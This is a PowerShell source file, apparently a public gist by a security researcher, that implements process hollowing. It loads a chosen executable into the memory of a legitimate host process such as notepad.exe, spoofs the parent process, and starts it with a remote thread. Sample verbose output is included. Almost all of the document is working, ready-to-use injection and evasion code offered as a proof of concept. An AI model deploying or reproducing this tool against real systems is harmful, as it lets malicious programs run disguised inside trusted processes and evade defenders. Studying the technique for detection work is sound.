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Created June 13, 2018 12:02
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Process Hollowing with PowerShell - by FuzzySec
function Start-Hollow {
This is a proof-of-concept for process hollowing. There is nothing new here except
maybe the use of NtCreateProcessEx which has some advantages in that it offers a
convenient way to set a parent process and avoids the bothersome Get/SetThreadContext.
On the flipside CreateRemoteThreadEx/NtCreateThreadEx are pretty suspicious API's.
I wrote this POC mostly to educate myself on the mechanics of hollowing. It is possible
to load the Hollow from an internal byte array straight into memory but I have not
implemented this functionality.
- I tested this POC on x32 Win7 and x64 Win10 RS4.
- You can only create an x64 processes on an x64 host architecture.
Author: Ruben Boonen (@FuzzySec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
The sponsor PE, this is the executable that will host the binary.
The PE that will run inside the sponsor.
Optionally specify a PID for the parent process of the hollow. This requires the
appropriate access rights to the process. If unspecified, PowerShell will be the parent.
# Create a Hollow from a PE on disk with explorer as the parent.
# x64 Win10 RS4
C:\PS> Start-Hollow -Sponsor C:\Windows\System32\notepad.exe -Hollow C:\Some\PE.exe -ParentPID 8304 -Verbose
VERBOSE: [?] A place where souls may mend your ailing mind..
VERBOSE: [+] Opened file for access
VERBOSE: [+] Created section from file handle
VERBOSE: [+] Opened handle to the parent => explorer
VERBOSE: [+] Created process from section
VERBOSE: [+] Acquired PBI
VERBOSE: [+] Sponsor architecture is x64
VERBOSE: [+] Sponsor ImageBaseAddress => 7FF69E9F0000
VERBOSE: [+] Allocated space for the Hollow process
VERBOSE: [+] Duplicated Hollow PE headers to the Sponsor
VERBOSE: [+] Duplicated .text section to the Sponsor
VERBOSE: [+] Duplicated .rdata section to the Sponsor
VERBOSE: [+] Duplicated .data section to the Sponsor
VERBOSE: [+] Duplicated .pdata section to the Sponsor
VERBOSE: [+] Duplicated .rsrc section to the Sponsor
VERBOSE: [+] Duplicated .reloc section to the Sponsor
VERBOSE: [+] New process ImageBaseAddress => 40000000
VERBOSE: [+] Created Hollow process parameters
VERBOSE: [+] Allocated memory in the Hollow
VERBOSE: [+] Process parameters duplicated into the Hollow
VERBOSE: [+] Rewrote Hollow->PEB->pProcessParameters
VERBOSE: [+] Created Hollow main thread..
[Parameter(Mandatory = $True)]
[Parameter(Mandatory = $True)]
[Parameter(Mandatory = $False)]
# Native API Definitions
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
public enum AllocationProtect : uint
NONE = 0x00000000,
PAGE_EXECUTE = 0x00000010,
PAGE_EXECUTE_READ = 0x00000020,
PAGE_NOACCESS = 0x00000001,
PAGE_READONLY = 0x00000002,
PAGE_READWRITE = 0x00000004,
PAGE_WRITECOPY = 0x00000008,
PAGE_GUARD = 0x00000100,
PAGE_NOCACHE = 0x00000200,
public enum SectionFlags : uint
TYPE_NO_PAD = 0x00000008,
CNT_CODE = 0x00000020,
LNK_INFO = 0x00000200,
LNK_REMOVE = 0x00000800,
LNK_COMDAT = 0x00001000,
NO_DEFER_SPEC_EXC = 0x00004000,
GPREL = 0x00008000,
MEM_FARDATA = 0x00008000,
MEM_PURGEABLE = 0x00020000,
MEM_16BIT = 0x00020000,
MEM_LOCKED = 0x00040000,
MEM_PRELOAD = 0x00080000,
ALIGN_1BYTES = 0x00100000,
ALIGN_2BYTES = 0x00200000,
ALIGN_4BYTES = 0x00300000,
ALIGN_8BYTES = 0x00400000,
ALIGN_16BYTES = 0x00500000,
ALIGN_32BYTES = 0x00600000,
ALIGN_64BYTES = 0x00700000,
ALIGN_128BYTES = 0x00800000,
ALIGN_256BYTES = 0x00900000,
ALIGN_512BYTES = 0x00A00000,
ALIGN_1024BYTES = 0x00B00000,
ALIGN_2048BYTES = 0x00C00000,
ALIGN_4096BYTES = 0x00D00000,
ALIGN_8192BYTES = 0x00E00000,
ALIGN_MASK = 0x00F00000,
LNK_NRELOC_OVFL = 0x01000000,
MEM_DISCARDABLE = 0x02000000,
MEM_NOT_CACHED = 0x04000000,
MEM_NOT_PAGED = 0x08000000,
MEM_SHARED = 0x10000000,
MEM_EXECUTE = 0x20000000,
MEM_READ = 0x40000000,
MEM_WRITE = 0x80000000
public struct UNICODE_STRING
public UInt16 Length;
public UInt16 MaximumLength;
public IntPtr Buffer;
public Int32 Length;
public IntPtr RootDirectory;
public IntPtr ObjectName;
public UInt32 Attributes;
public IntPtr SecurityDescriptor;
public IntPtr SecurityQualityOfService;
public struct IO_STATUS_BLOCK
public IntPtr Status;
public IntPtr Information;
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct LARGE_INTEGER
public uint LowPart;
public int HighPart;
public IntPtr ExitStatus;
public IntPtr PebBaseAddress;
public IntPtr AffinityMask;
public IntPtr BasePriority;
public UIntPtr UniqueProcessId;
public IntPtr InheritedFromUniqueProcessId;
[StructLayout(LayoutKind.Sequential, Pack=1)]
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 8)]
public string Name;
public UInt32 VirtualSize;
public UInt32 VirtualAddress;
public UInt32 SizeOfRawData;
public UInt32 PointerToRawData;
public UInt32 PointerToRelocations;
public UInt32 PointerToLinenumbers;
public UInt16 NumberOfRelocations;
public UInt16 NumberOfLinenumbers;
public SectionFlags Characteristics;
public static class Hollow
public static extern IntPtr OpenProcess(
UInt32 processAccess,
bool bInheritHandle,
int processId);
public static extern Boolean WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
IntPtr lpBuffer,
UInt32 nSize,
ref UInt32 lpNumberOfBytesWritten);
public static extern Boolean ReadProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
IntPtr lpBuffer,
UInt32 dwSize,
ref UInt32 lpNumberOfBytesRead);
public static extern IntPtr VirtualAllocEx(
IntPtr hProcess,
IntPtr lpAddress,
uint dwSize,
int flAllocationType,
int flProtect);
public static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
UInt32 dwSize,
AllocationProtect flNewProtect,
ref UInt32 lpflOldProtect);
public static extern UInt32 NtOpenFile(
ref IntPtr FileHandle,
UInt32 DesiredAccess,
ref IO_STATUS_BLOCK IoStatusBlock,
UInt32 ShareAccess,
UInt32 OpenOptions);
public static extern UInt32 NtCreateSection(
ref IntPtr section,
UInt32 desiredAccess,
IntPtr pAttrs,
uint pageProt,
uint allocationAttribs,
IntPtr hFile);
public static extern UInt32 NtCreateProcessEx(
ref IntPtr ProcessHandle,
UInt32 DesiredAccess,
IntPtr ObjectAttributes,
IntPtr hInheritFromProcess,
uint Flags,
IntPtr SectionHandle,
IntPtr DebugPort,
IntPtr ExceptionPort,
Byte InJob);
public static extern UInt32 NtQueryInformationProcess(
IntPtr processHandle,
UInt32 processInformationClass,
ref PROCESS_BASIC_INFORMATION processInformation,
UInt32 processInformationLength,
ref UInt32 returnLength);
public static extern UInt32 RtlCreateProcessParametersEx(
ref IntPtr pProcessParameters,
IntPtr ImagePathName,
IntPtr DllPath,
IntPtr CurrentDirectory,
IntPtr CommandLine,
IntPtr Environment,
IntPtr WindowTitle,
IntPtr DesktopInfo,
IntPtr ShellInfo,
IntPtr RuntimeData,
UInt32 Flags);
public static extern UInt32 NtCreateThreadEx(
ref IntPtr hThread,
UInt32 DesiredAccess,
IntPtr ObjectAttributes,
IntPtr ProcessHandle,
IntPtr lpStartAddress,
IntPtr lpParameter,
bool CreateSuspended,
UInt32 StackZeroBits,
UInt32 SizeOfStackCommit,
UInt32 SizeOfStackReserve,
IntPtr lpBytesBuffer);
# Helper Functions
function Invoke-AllTheChecks {
# Check PowerShell proc architecture
if ([IntPtr]::Size -eq 4) {
$PoshIs32 = $true
} else {
$PoshIs32 = $false
# Check machine architecture
if (${Env:ProgramFiles(x86)}) {
$OsIs32 = $false
} else {
$OsIs32 = $true
# Check Sponsor and Hollow details
try {
$SponsorPath = (Resolve-Path $Sponsor -ErrorAction Stop).Path
$HollowPath = (Resolve-Path $Hollow -ErrorAction Stop).Path
$SponsorArch = Get-PEArch -Path $SponsorPath
$HollowArch = Get-PEArch -Path $HollowPath
} catch {
$SponsorPath = $false
$HollowPath = $false
$SponsorArch = $false
$HollowArch = $false
# If $ParentPID check it exists
if ($ParentPID) {
$GetProc = Get-Process -Id $ParentPID -ErrorAction SilentlyContinue
if ($GetProc) {
$ProcIsValid = $true
} else {
$ProcIsValid = $false
} else {
# PowerShell will be the parent
$ProcIsValid = $true
$HashTable = @{
PoshIs32 = $PoshIs32
OsIs32 = $OsIs32
SponsorPath = $SponsorPath
HollowPath = $HollowPath
SponsorArch = $SponsorArch
HollowArch = $HollowArch
ProcIsValid = $ProcIsValid
New-Object PSObject -Property $HashTable
function Get-PEArch {
try {
$BinPath = (Resolve-Path $Path -ErrorAction Stop).Path
$BinBytes = [System.IO.File]::ReadAllBytes($BinPath)
[Int16]$PEOffset = '0x{0}' -f (($BinBytes[63..60] | % {$_.ToString('X2')}) -join '')
$OptOffset = $PEOffset + 24
[Int16]$PEArch = '0x{0}' -f ((($BinBytes[($OptOffset+1)..($OptOffset)]) | % {$_.ToString('X2')}) -join '')
} catch {
# We do a sanity check here but really the user should drink more coffee
[Int16]$MZ = '0x{0}' -f ((($BinBytes[0..1]) | % {$_.ToString('X2')}) -join '')
[Int16]$PE = '0x{0}' -f ((($BinBytes[($PEOffset)..($PEOffset+1)]) | % {$_.ToString('X2')}) -join '')
if ($MZ -ne 0x4D5A -Or $PE -ne 0x5045) {
$PEArch # 0x010b = x32; 0x020b = x64
function Get-PBI {
$PROCESS_BASIC_INFORMATION_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($PROCESS_BASIC_INFORMATION)
[UInt32]$RetLen = 0
$CallResult = [Hollow]::NtQueryInformationProcess($hProcess,0,[ref]$PROCESS_BASIC_INFORMATION,$PROCESS_BASIC_INFORMATION_Size, [ref]$RetLen)
if ($CallResult -ne 0) {
} else {
function Get-HollowPEProperties {
# Some proper ghetto PE parsing
$e_lfanew = [System.Runtime.InteropServices.Marshal]::ReadInt32($($pHollow.ToInt64() + 0x3C))
$ImageFileHeader = $pHollow.ToInt64() + $e_lfanew
[UInt16]$SectionCount = [System.Runtime.InteropServices.Marshal]::ReadInt16($($ImageFileHeader + 0x6))
[UInt32]$SizeOfOptionalHeader = [System.Runtime.InteropServices.Marshal]::ReadInt16($($ImageFileHeader + 0x14))
$OptionalHeader = $ImageFileHeader + 0x18
$SectionHeadersOffset = $OptionalHeader + $SizeOfOptionalHeader
[UInt32]$EntryPoint = [System.Runtime.InteropServices.Marshal]::ReadInt32($($OptionalHeader + 0x10))
[UInt32]$BaseOfCode = [System.Runtime.InteropServices.Marshal]::ReadInt32($($OptionalHeader + 0x14))
if ($PEArch -eq 0x010b) {
[UInt32]$ImageBase = [System.Runtime.InteropServices.Marshal]::ReadInt32($($OptionalHeader + 0x1C))
} else {
[UInt64]$ImageBase = [System.Runtime.InteropServices.Marshal]::ReadInt32($($OptionalHeader + 0x18))
[UInt32]$SizeOfImage = [System.Runtime.InteropServices.Marshal]::ReadInt32($($OptionalHeader + 0x38))
[UInt32]$SizeOfHeaders = [System.Runtime.InteropServices.Marshal]::ReadInt32($($OptionalHeader + 0x3C))
$HashTable = @{
SectionCount = $SectionCount
pSectionHeaders = $SectionHeadersOffset
EntryPoint = $EntryPoint
BaseOfCode = $BaseOfCode
ImageBase = $ImageBase
SizeOfImage = $SizeOfImage
SizeOfHeaders = $SizeOfHeaders
New-Object PSObject -Property $HashTable
function Set-RemoteMemory {
[UInt32]$BytesWritten = 0
$CallResult = [Hollow]::WriteProcessMemory($hProcess,$pDestination,$pSource,$CopySize,[ref]$BytesWritten)
if (!$CallResult) {
Write-Verbose "[!] Failed to write section memory"
[UInt32]$OldProtect = 0
$CallResult = [Hollow]::VirtualProtectEx($hProcess,$pDestination,$ProtectSize,$Protect,[ref]$OldProtect)
if (!$CallResult) {
Write-Verbose "[!] Failed to set section memory attributes"
function Set-RemoteProcessParameters {
# Create Unicode process parameter strings
$uTargetPath = Emit-UNICODE_STRING -Data $Runtime.SponsorPath
$uDllDir = Emit-UNICODE_STRING -Data "C:\Windows\System32"
$uCurrentDir = Emit-UNICODE_STRING -Data $(Split-Path $Runtime.SponsorPath -Parent)
$uWindowName = Emit-UNICODE_STRING -Data "Hollow"
# Create process parameters struct
$pProcessParameters = [IntPtr]::Zero
$CallResult = [Hollow]::RtlCreateProcessParametersEx([ref]$pProcessParameters,$uTargetPath,$uDllDir,$uCurrentDir,$uTargetPath,[IntPtr]::Zero,$uWindowName,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero,1)
if ($CallResult -ne 0) {
Write-Verbose "[!] Failed to create process parameters"
} else {
Write-Verbose "[+] Created Hollow process parameters"
# Copy parameters to the Hollow
$ProcParamsLength = [System.Runtime.InteropServices.Marshal]::ReadInt32($($pProcessParameters.ToInt64())+4)
[IntPtr]$HollowProcParams = [Hollow]::VirtualAllocEx($hProcess,$pProcessParameters,$ProcParamsLength,0x3000,0x4)
if ($HollowProcParams -eq [IntPtr]::Zero) {
Write-Verbose "[!] Failed to allocate memory in the Hollow"
} else {
Write-Verbose "[+] Allocated memory in the Hollow"
$BytesWritten = 0
$CallResult = [Hollow]::WriteProcessMemory($hProcess,$pProcessParameters,$pProcessParameters,$ProcParamsLength,[ref]$BytesWritten)
if (!$CallResult) {
Write-Verbose "[!] Failed to write process parameters to the Hollow"
} else {
Write-Verbose "[+] Process parameters duplicated into the Hollow"
# Overwrite PEB
if ($Runtime.SponsorArch -eq 0x010b) {
# Sponsor is x32
[IntPtr]$rProcParamOffset = $rPEB + 0x10
$WriteSize = 4
[IntPtr]$lpBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($WriteSize)
} else {
# Sponsor is x64
[IntPtr]$rProcParamOffset = $rPEB + 0x20
$WriteSize = 8
[IntPtr]$lpBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($WriteSize)
$BytesWritten = 0
$CallResult = [Hollow]::WriteProcessMemory($hProcess,$rProcParamOffset,$lpBuffer,$WriteSize,[ref]$BytesWritten)
if (!$CallResult) {
Write-Verbose "[!] Failed to rewrite Hollow->PEB->pProcessParameters"
} else {
Write-Verbose "[+] Rewrote Hollow->PEB->pProcessParameters"
function Emit-UNICODE_STRING {
$UnicodeObject = New-Object UNICODE_STRING
$UnicodeObject_Buffer = $Data
[UInt16]$UnicodeObject.Length = $UnicodeObject_Buffer.Length*2
[UInt16]$UnicodeObject.MaximumLength = $UnicodeObject.Length+1
[IntPtr]$UnicodeObject.Buffer = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($UnicodeObject_Buffer)
[IntPtr]$InMemoryStruct = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(16) # enough for x32/x64
[system.runtime.interopservices.marshal]::StructureToPtr($UnicodeObject, $InMemoryStruct, $true)
# (1) Invoke all the checks -> (╯°□°)╯︵ ┻━┻
$Runtime = Invoke-AllTheChecks
if ($Runtime.PoshIs32 -eq $true -And $Runtime.OsIs32 -eq $false) {
Write-Verbose "[!] Cannot perform process hollowing from x32 PowerShell on x64 OS.."
if ($Runtime.SponsorPath -eq $false) {
Write-Verbose "[!] Failed to validate Sponsor or Hollow parameters.."
if ($Runtime.OsIs32 -eq $false -And $Runtime.SponsorArch -eq 0x010b) {
Write-Verbose "[!] Cannot create x32 hollowed process on x64 OS.."
if ($Runtime.SponsorArch -ne $Runtime.HollowArch) {
Write-Verbose "[!] Sponsor and Hollow architectures do not match.."
if ($Runtime.ProcIsValid -eq $false) {
Write-Verbose "[!] Invalid parent process selected.."
# You know, because passing up a chance to reference Dark Souls would be sacrilege
Write-Verbose "[?] A place where souls may mend your ailing mind.."
# (2) Create suspended process
# -> Emulate modern CreateProcess workflow though NtCreateProcessEx
# -> Open, Create Section, Start Process
# We do a bit of extra legwork here so we can set a parent process and avoid thread context.
[IntPtr]$hFile = [IntPtr]::Zero
$ObjAttr.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($ObjAttr)
$ObjAttr.ObjectName = Emit-UNICODE_STRING -Data "\??\$($Runtime.SponsorPath)"
$ObjAttr.Attributes = 0x40 # OBJ_CASE_INSENSITIVE
$IoStatusBlock = New-Object IO_STATUS_BLOCK
# DesiredAccess = FILE_READ_DATA(0x1)|FILE_EXECUTE(0x20)|FILE_READ_ATTRIBUTES(0x80)|SYNCHRONIZE(0x100000) = 0x1000A1
# ShareAccess = FILE_SHARE_READ(0x1)|FILE_SHARE_DELETE(0x4) = 0x5
$CallResult = [Hollow]::NtOpenFile([ref]$hFile,0x1000A1,[ref]$ObjAttr,[ref]$IoStatusBlock,0x5,0x60)
if (!$CallResult) {
Write-Verbose "[+] Opened file for access"
} else {
Write-Verbose "[!] NtOpenFile failed.."
# Create section from PE
$hSection = [IntPtr]::Zero
$LargeInteger = New-Object LARGE_INTEGER
$CallResult = [Hollow]::NtCreateSection([ref]$hSection,0xF001F,[IntPtr]::Zero,[ref]$LargeInteger,2,0x1000000,$hFile)
if (!$CallResult) {
Write-Verbose "[+] Created section from file handle"
} else {
Write-Verbose "[!] NtCreateSection failed.."
# Get handle to the parent PID
if ($ParentPID) {
$hParentPID = [Hollow]::OpenProcess(0x1F0FFF,$false,$ParentPID)
if ($hParentPID -eq [IntPtr]::Zero) {
Write-Verbose "[!] Unable to open handle to the specified parent => $($(Get-Process -PID $ParentPID).ProcessName)"
} else {
Write-Verbose "[+] Opened handle to the parent => $($(Get-Process -PID $ParentPID).ProcessName)"
} else {
# This is a pseudo handle to self
$hParentPID = [IntPtr]-1
# Start process from section
$hProcess = [IntPtr]::Zero
$CallResult = [Hollow]::NtCreateProcessEx([ref]$hProcess,0x1FFFFF,[IntPtr]::Zero,$hParentPID,4,$hSection,[IntPtr]::Zero,[IntPtr]::Zero,0)
if ($hProcess -eq [IntPtr]::Zero) {
Write-Verbose "[!] NtCreateProcessEx failed.."
} else {
Write-Verbose "[+] Created process from section"
# (3) Read data from the suspended process
# -> Get PEB, Read ImageBase
# -> Note: NtCreateProcessEx does not create a main thread on suspend
# Get process basic information
$ProcessBasicInformation = Get-PBI -hProcess $hProcess
if (!$ProcessBasicInformation) {
Write-Verbose "[!] Failed to acquire PBI"
} else {
Write-Verbose "[+] Acquired PBI"
# Get ImageBase for suspended process
$SponsorPEBAddress = $ProcessBasicInformation.PebBaseAddress.ToInt64()
if ($Runtime.SponsorArch -eq 0x010b) {
# x32 sponsor
Write-Verbose "[+] Sponsor architecture is x32"
[IntPtr]$rImgBaseOffset = $SponsorPEBAddress + 0x8
$ReadSize = 4
} else {
# x64 sponsor
Write-Verbose "[+] Sponsor architecture is x64"
[IntPtr]$rImgBaseOffset = $SponsorPEBAddress + 0x10
$ReadSize = 8
$BytesRead = 0
[IntPtr]$lpBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ReadSize)
$CallResult = [Hollow]::ReadProcessMemory($hProcess,$rImgBaseOffset,$lpBuffer,$ReadSize,[ref]$BytesRead)
if ($CallResult -eq 0) {
Write-Verbose "[!] Failed to read Sponsor image base from PEB"
} else {
if ($Runtime.SponsorArch -eq 0x010b) {
$SponsorImageBase = [System.Runtime.InteropServices.Marshal]::ReadInt32($($lpBuffer.ToInt64()))
} else {
$SponsorImageBase = [System.Runtime.InteropServices.Marshal]::ReadInt64($($lpBuffer.ToInt64()))
Write-Verbose "[+] Sponsor ImageBaseAddress => $('{0:X}' -f $SponsorImageBase)"
# (4) Map the Hollow into the Sponsor
# -> Get Hollow properties, Remotely allocate with correct permissions
# Get Hollow properties
$HollowByteArray = [System.IO.File]::ReadAllBytes($Runtime.HollowPath)
[IntPtr]$pHollow = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($HollowByteArray.Length)
[System.Runtime.InteropServices.Marshal]::Copy($HollowByteArray, 0, $pHollow, $HollowByteArray.Length)
$HollowPEProperties = Get-HollowPEProperties -pHollow $pHollow -PEArch $Runtime.HollowArch
# Enumerate section details
$SectionArray = @()
$ImageSectionHeader = (New-Object IMAGE_SECTION_HEADER).GetType()
for ($i=0; $i -lt $HollowPEProperties.SectionCount; $i++) {
$pSectionInstance = $HollowPEProperties.pSectionHeaders + $($i*0x28)
$SectionArray += [System.Runtime.InteropServices.Marshal]::PtrToStructure([IntPtr]$pSectionInstance, [type]$ImageSectionHeader)
# Alloc space for the image (RW)
# => I think this should be PAGE_EXECUTE_WRITECOPY (0x80) but VP fails to set this
$pRemoteImageBase = [Hollow]::VirtualAllocEx($hProcess,$(New-Object System.Intptr -ArgumentList $HollowPEProperties.ImageBase),$HollowPEProperties.SizeOfImage,0x3000,0x04)
if ($pRemoteImageBase -eq [IntPtr]::Zero) {
Write-Verbose "[!] Failed to allocate memory in remote process"
} else {
Write-Verbose "[+] Allocated space for the Hollow process"
# Duplicate PE header
$flNewProtect = [AllocationProtect]::PAGE_READONLY
$CallResult = Set-RemoteMemory -hProcess $hProcess -pSource $pHollow -pDestination $pRemoteImageBase -CopySize $HollowPEProperties.SizeOfHeaders -ProtectSize $HollowPEProperties.BaseOfCode -Protect $flNewProtect
if (!$CallResult) {
Write-Verbose "[!] Failed to duplicate Hollow PE headers"
} else {
Write-Verbose "[+] Duplicated Hollow PE headers to the Sponsor"
# Duplicate sections
$SectionArray | ForEach-Object {
# Kind of whack but unsure how to translate properly...
$ProtectSuccess = $true
$IsRead = $($_.Characteristics -band [SectionFlags]::MEM_READ)
$IsWrite = $($_.Characteristics -band [SectionFlags]::MEM_WRITE)
$IsExecute = $($_.Characteristics -band [SectionFlags]::MEM_EXECUTE)
if ($IsRead -And !$IsWrite -And !$IsExecute) {
$flNewProtect = [AllocationProtect]::PAGE_READONLY
} elseif ($IsRead -And $IsWrite -And !$IsExecute) {
$flNewProtect = [AllocationProtect]::PAGE_READWRITE
} elseif ($IsRead -And $IsWrite -And $IsExecute) {
$flNewProtect = [AllocationProtect]::PAGE_EXECUTE_READWRITE
} elseif ($IsRead -And !$IsWrite -And $IsExecute) {
$flNewProtect = [AllocationProtect]::PAGE_EXECUTE_READ
} elseif (!$IsRead -And !$IsWrite -And $IsExecute) {
$flNewProtect = [AllocationProtect]::PAGE_EXECUTE
} else {
$ProtectSuccess = $false
# Calculate offsets
$pVirtualSectionBase = [IntPtr]($pRemoteImageBase.ToInt64() + $_.VirtualAddress)
$pRawSectionBase = [IntPtr]($pHollow.ToInt64() + $_.PointerToRawData)
# Duplicate
$CallResult = Set-RemoteMemory -hProcess $hProcess -pSource $pRawSectionBase -pDestination $pVirtualSectionBase -CopySize $_.SizeOfRawData -ProtectSize $_.VirtualSize -Protect $flNewProtect
if (!$CallResult) {
Write-Verbose "[!] Failed to duplicate section: $($_.Name)"
} else {
Write-Verbose "[+] Duplicated $($_.Name) section to the Sponsor"
if (!$ProtectSuccess) {
Write-Verbose "[!] We don't know about this section flag: $($_.Characteristics)"
# (5) Animate the Hollow
# -> Rewrite PEB ImageBase, Create process parameters, Start main thread
# Overwrite PEB->ImageBaseAddress
$NewImageBase = [System.BitConverter]::GetBytes($HollowPEProperties.ImageBase)
$pNewImageBase = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(8) # enough for x32/x64
[System.Runtime.InteropServices.Marshal]::Copy($NewImageBase, 0, $pNewImageBase, $NewImageBase.Length)
[UInt32]$BytesWritten = 0
$CallResult = [Hollow]::WriteProcessMemory($hProcess,$rImgBaseOffset,$pNewImageBase,$ReadSize,[ref]$BytesWritten)
if (!$CallResult) {
Write-Verbose "[!] Failed to overwrite PEB->ImageBaseAddress"
} else {
Write-Verbose "[+] New process ImageBaseAddress => $('{0:X}' -f $HollowPEProperties.ImageBase)"
# Create process parameters
$CallResult = Set-RemoteProcessParameters -hProcess $hProcess -rPEB $SponsorPEBAddress
# Animate Hollow
$hRemoteThread = [IntPtr]::Zero
$lpStartAddress = New-Object System.Intptr -ArgumentList $($HollowPEProperties.ImageBase + $HollowPEProperties.EntryPoint)
$CallResult = [Hollow]::NtCreateThreadEx([ref]$hRemoteThread,0x1FFFFF,[IntPtr]::Zero,$hProcess,[IntPtr]$lpStartAddress,[IntPtr]::Zero,$false,0,0,0,[IntPtr]::Zero)
if ($CallResult -ne 0) {
Write-Verbose "[!] NtCreateThreadEx failed.."
} else {
Write-Verbose "[+] Created Hollow main thread.."
# Free $pHollow
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